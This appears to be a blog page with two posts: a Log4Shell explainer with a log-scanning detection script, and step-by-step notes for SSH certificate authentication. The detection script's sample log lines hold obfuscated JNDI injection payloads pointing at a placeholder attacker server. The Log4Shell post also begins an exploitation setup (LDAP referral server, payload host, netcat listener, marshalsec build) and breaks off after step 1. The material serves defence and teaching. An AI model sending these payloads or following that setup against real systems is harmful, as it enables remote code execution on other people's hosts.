
2024

Log4Shell

Log4j

Background

Log4Shell is the name given to a critical vulnerability in Apache Log4j that became public in December 2021 (tracked as CVE-2021-44228); the name reflects the fact that exploiting it commonly yields a shell on the affected host. Log4j is a logging framework that developers use to record activity within their applications. It is part of Apache Logging Services, and the library is widely used for its performance and flexibility, offering logging capabilities that a large share of Java applications depend on.

The exploit takes advantage of how Log4j 2 processes log messages: the library's message lookup feature lets a logged string contain expressions such as ${jndi:...}, which are resolved through the Java Naming and Directory Interface (JNDI). JNDI is a Java API that lets a program look up data and resources (such as objects) by name, including from remote LDAP and RMI servers. If attacker-controlled input (a User-Agent header, a username, a chat message) ends up in a log message, the lookup is sent to an attacker-controlled server, and the object it returns is loaded and executed, leading to execution of arbitrary code with no authentication required.
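To make the trigger concrete, here is an added example (not code from the original post) that scans web-server access-log lines for the lookup strings that set off the vulnerable JNDI path, after undoing the nesting and case tricks attackers used to evade naive `${jndi:` matching. The log lines are constructed for the demo, and 198.51.100.7 is a placeholder for an attacker-controlled LDAP/RMI server.

```shell
#!/bin/sh
# Added example: spot Log4Shell probes in access-log lines.
# The sample lines in sample_log are constructed for this demo (not real
# captures); 198.51.100.7 stands in for an attacker-controlled server.

# Undo the evasions that Log4j's lookup engine would itself resolve before
# evaluating ${jndi:...}: ${lower:j} / ${upper:J} -> j, and the default-value
# trick ${::-j} or ${env:NOPE:-j} -> j. Loop because payloads nest these.
normalize_lookup() {
  s=$1
  i=0
  while [ "$i" -lt 5 ]; do
    n=$(printf '%s\n' "$s" | sed -E \
      -e 's/\$\{(lower|upper):([A-Za-z])\}/\2/g' \
      -e 's/\$\{[A-Za-z]*:[^}]*:-([A-Za-z])\}/\1/g')
    if [ "$n" = "$s" ]; then
      break
    fi
    s=$n
    i=$((i + 1))
  done
  printf '%s\n' "$s"
}

# Exit 0 when the normalized line still contains a JNDI lookup, else 1.
# Fixed-string, case-insensitive match: the scheme (ldap, rmi, dns, ...)
# does not matter, the lookup itself is the problem.
is_log4shell_probe() {
  normalize_lookup "$1" | grep -qiF '${jndi:'
}

# Read log lines on stdin, print the offending ones with their line number,
# and return 0 if anything was found.
scan_log() {
  lineno=0
  found=1
  while IFS= read -r line; do
    lineno=$((lineno + 1))
    if is_log4shell_probe "$line"; then
      found=0
      printf 'line %d: %s\n' "$lineno" "$line"
    fi
  done
  return "$found"
}

# Number of matching lines on stdin.
count_probes() {
  scan_log | wc -l | tr -d ' '
}

# Constructed Apache-style access log: two benign lines, four probes using
# the plain, ${lower:}, ${::-} and ${env:...:-} forms.
sample_log() {
  cat <<'EOF'
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 404 196 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"
10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:06 +0000] "POST /login HTTP/1.1" 401 0 "-" "${${env:NaN:-j}ndi:rmi://198.51.100.7:1099/a}"
EOF
}

# Demo run: prints the four probe lines.
sample_log | scan_log
```

Run it against a real log with `scan_log < /var/log/httpd/access_log`. The normalization step is the part worth keeping: plain `grep '${jndi'` misses three of the four constructed probes, and that gap is exactly what the obfuscated variants were written to exploit.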

Process

A great many applications rely on Log4j, including several Apache projects themselves. Once you have identified a vulnerable service, you can set up the test infrastructure. That means running an LDAP server that answers the JNDI lookup with a reference to a class hosted elsewhere (the referenced repo's .jar file provides such a server), an HTTP server on the attacker host that serves the class file carrying the payload, and a netcat listener to receive the callback once the vulnerable application's logging performs the lookup and runs the payload.

What does that actually look like?

  1. First grab the tools and build the jar (the repo does not ship a prebuilt one; it builds with Maven).

    git clone https://github.com/mbechler/marshalsec
    
    cd marshalsec && ls
    
    # build with Maven; the fat jar lands in target/marshalsec-*-all.jar
    mvn clean package -DskipTests
    

Setting Up SSH Certificates

This year, I completed SANS Institute and Counter Hack's Holiday Hack Challenge. One of the speakers, Thomas Bouve, gave an excellent talk about SSH certificates. Below are the step-by-step notes I documented as a reference. I strongly encourage anyone interested in the topic to watch the presentation: Thomas covers more foundational knowledge at the beginning of the video and gives more context and explanation than I provide here. But if you're looking for a quick copy/paste/edit of commands to get the job done, this might be a helpful reference.

secure

Notes & Assumptions
  • In the example, 10.10.10.10 is the address of the server we want to be able to SSH into with a signed certificate.
  • The username jesinia will be used to SSH into the server.
  • It is assumed that you do not log in to the server as root directly and that jesinia has sudo permissions there. If you have root access, feel free to drop the "sudo" references.
  • Commands for restarting the SSH service are for Fedora or Red Hat distributions. If you use a different flavor of Linux, your commands for that portion may differ.
  • I use vim, but you can use whichever text editor you prefer.
  • The notes and level of detail are purposely aimed at a broader audience with less experience.

1. Log into Server Using Password

In Server Terminal:
What is happening here?

This command simply logs you in over SSH; if a password is required, you will be prompted to enter it. Password login is only needed for this initial setup, since the remaining steps replace it with certificate authentication.
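The certificate flow the notes build toward, as an added example that is not part of the original notes: it generates a CA, signs a user key for the principal jesinia, inspects and verifies the certificate offline, and prints the server-side steps (copy the CA public key, set TrustedUserCAKeys, restart sshd on Fedora/RHEL). Everything runs in a scratch directory on the client so the mechanics can be checked before touching 10.10.10.10; the user name, server address and the key identity "jesinia-laptop" are assumptions for the demo.

```shell
#!/bin/sh
# Added example (not from the original notes): SSH user-certificate flow,
# end to end, in a temp dir. Assumed names: user "jesinia", server
# 10.10.10.10, key identity "jesinia-laptop".

# 1. Create the CA key pair. The private key stays wherever you sign keys;
#    only user_ca.pub is copied to servers.
make_ssh_ca() {   # $1 = work dir
  ssh-keygen -q -t ed25519 -N '' -C 'user-ca' -f "$1/user_ca"
}

# 2. Create the user's key and sign it. -I is the identity that appears in
#    sshd's auth log, -n the principals (account names) the cert is valid
#    for, -V the validity window. Output: $1/id_ed25519-cert.pub, which ssh
#    picks up automatically when it sits next to the private key.
sign_user_key() {   # $1 = work dir, $2 = key id, $3 = principal, $4 = validity
  ssh-keygen -q -t ed25519 -N '' -C "$3" -f "$1/id_ed25519"
  ssh-keygen -q -s "$1/user_ca" -I "$2" -n "$3" -V "$4" "$1/id_ed25519.pub"
}

# 3. Inspect the certificate: list the principals it is valid for.
cert_principals() {   # $1 = cert file
  ssh-keygen -L -f "$1" | awk '
    /Principals:/       { in_p = 1; next }
    /Critical Options:/ { in_p = 0 }
    in_p                { sub(/^[ \t]+/, ""); print }'
}

# 4. Verify offline that the cert was issued by our CA: the "Signing CA"
#    fingerprint inside the cert must equal the fingerprint of user_ca.pub.
cert_signed_by_ca() {   # $1 = cert file, $2 = CA public key
  cert_fp=$(ssh-keygen -L -f "$1" | grep 'Signing CA:' | grep -o 'SHA256:[A-Za-z0-9+/=]*')
  ca_fp=$(ssh-keygen -l -f "$2" | grep -o 'SHA256:[A-Za-z0-9+/=]*')
  [ -n "$cert_fp" ] && [ "$cert_fp" = "$ca_fp" ]
}

# 5. Server side: printed rather than run, because it happens over the
#    password login from step 1, with sudo, on the server itself.
server_side_steps() {   # $1 = CA public key on the client
  cat <<EOF
# from the client: copy the CA public key up
scp $1 jesinia@10.10.10.10:/tmp/user_ca.pub
# on the server: install it and trust it for user certs
sudo install -m 0644 /tmp/user_ca.pub /etc/ssh/user_ca.pub
echo 'TrustedUserCAKeys /etc/ssh/user_ca.pub' | sudo tee -a /etc/ssh/sshd_config
sudo sshd -t && sudo systemctl restart sshd   # Fedora/RHEL service name
# back on the client: the cert next to the key is used automatically
ssh -i <workdir>/id_ed25519 jesinia@10.10.10.10
EOF
}

demo() {
  d=$(mktemp -d)
  make_ssh_ca "$d"
  sign_user_key "$d" 'jesinia-laptop' 'jesinia' '+1d'
  ssh-keygen -L -f "$d/id_ed25519-cert.pub"
  echo "principals: $(cert_principals "$d/id_ed25519-cert.pub")"
  if cert_signed_by_ca "$d/id_ed25519-cert.pub" "$d/user_ca.pub"; then
    echo "certificate verifies against user_ca.pub"
  fi
  server_side_steps "$d/user_ca.pub"
  rm -rf "$d"
}

if command -v ssh-keygen >/dev/null 2>&1; then
  demo
else
  echo 'ssh-keygen not found; install OpenSSH to run this demo' >&2
fi
```

Two things worth checking on a real deployment that the demo makes visible: the principal list (the server only accepts the cert for accounts named in `-n`, so a cert for jesinia cannot log in as root), and the validity window, which is what lets you hand out short-lived access without ever editing authorized_keys on the server.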